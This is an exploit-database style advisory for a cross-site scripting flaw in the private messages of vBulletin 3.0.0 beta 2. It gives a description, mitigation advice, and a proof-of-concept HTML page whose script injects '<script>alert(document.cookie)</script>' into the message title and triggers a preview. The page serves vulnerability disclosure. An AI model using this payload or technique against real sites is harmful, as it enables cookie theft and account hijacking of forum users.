vBulletin 3.0.0 beta 2 Private Message Sanitization Vulnerability

vendor:

vBulletin

by:

SecurityFocus

7.5

CVSS

HIGH

Cross-site Scripting (XSS)

CWE

Product Name: vBulletin

Affected Version From: 3.0.0 beta 2

Affected Version To: 3.0.0 beta 2

Patch Exists: NO

Related CWE: N/A

CPE: vbulletin:vbulletin

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: None

2002

vBulletin 3.0.0 beta 2 Private Message Sanitization Vulnerability

A vulnerability has been reported in vBulletin 3.0.0 beta 2. The problem is said to occur due to insufficient sanitization of private messages. As a result, an attacker may be capable of embedding malicious HTML or script code within a private message. This code may be interpreted by a legitimate user when previewing the message.

Mitigation:

Ensure that all user-supplied input is properly sanitized before being used in the application.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/7594/info

A vulnerability has been reported in vBulletin 3.0.0 beta 2. The problem is said to occur due to insufficient sanitization of private messages. As a result, an attacker may be capable of embedding malicious HTML or script code within a private message. This code may be interpreted by a legitimate user when previewing the message.

It should be noted that vBulletin 3.0.0 beta 2 is not a public release and has only been made available to a small portion of selected sites. This issue does not affect any public releases of vBulletin. 

<html>
<body>
 <form action="http://[victim]/forum/private.php" method="post"
name="vbform">
  <input type="hidden" name="do" value="insertpm" />
  <input type="hidden" name="pmid" value="" />
  <input type="hidden" name="forward" value="" />
  <input type="hidden" name="receipt" value="0" />

  <input type="text" class="bginput" name="title" value="" size="40"
tabindex="2" />
  <textarea name="message" rows="20" cols="70" wrap="virtual"
tabindex="3">&lt;/textarea&gt;
  <input type="submit" class="button" name="sbutton" value="Post Message"
accesskey="s" tabindex="4" />
  <input type="submit" class="button" value="Preview Message" accesskey="p"
name="preview" onclick="this.form.dopreview = true; return
true;this.form.submit()" tabindex="5" >

  <input type="checkbox" name="savecopy" value="1" id="cb_savecopy"
checked="checked" />
  <input type="checkbox" name="signature" value="1" id="cb_signature" />
  <input type="checkbox" name="parseurl" value="1" id="cb_parseurl"
checked="checked" />
  <input type="checkbox" name="disablesmilies" value="1"
id="cb_disablesmilies" />
 </form>
<script>
 //Set Values and Submit
 // You can write your own JS codes
 var xss = "\"><script>alert(document.cookie)<\/script>";
 document.vbform.title.value=xss;
 document.vbform.preview.click();
</script>
</body>
</html>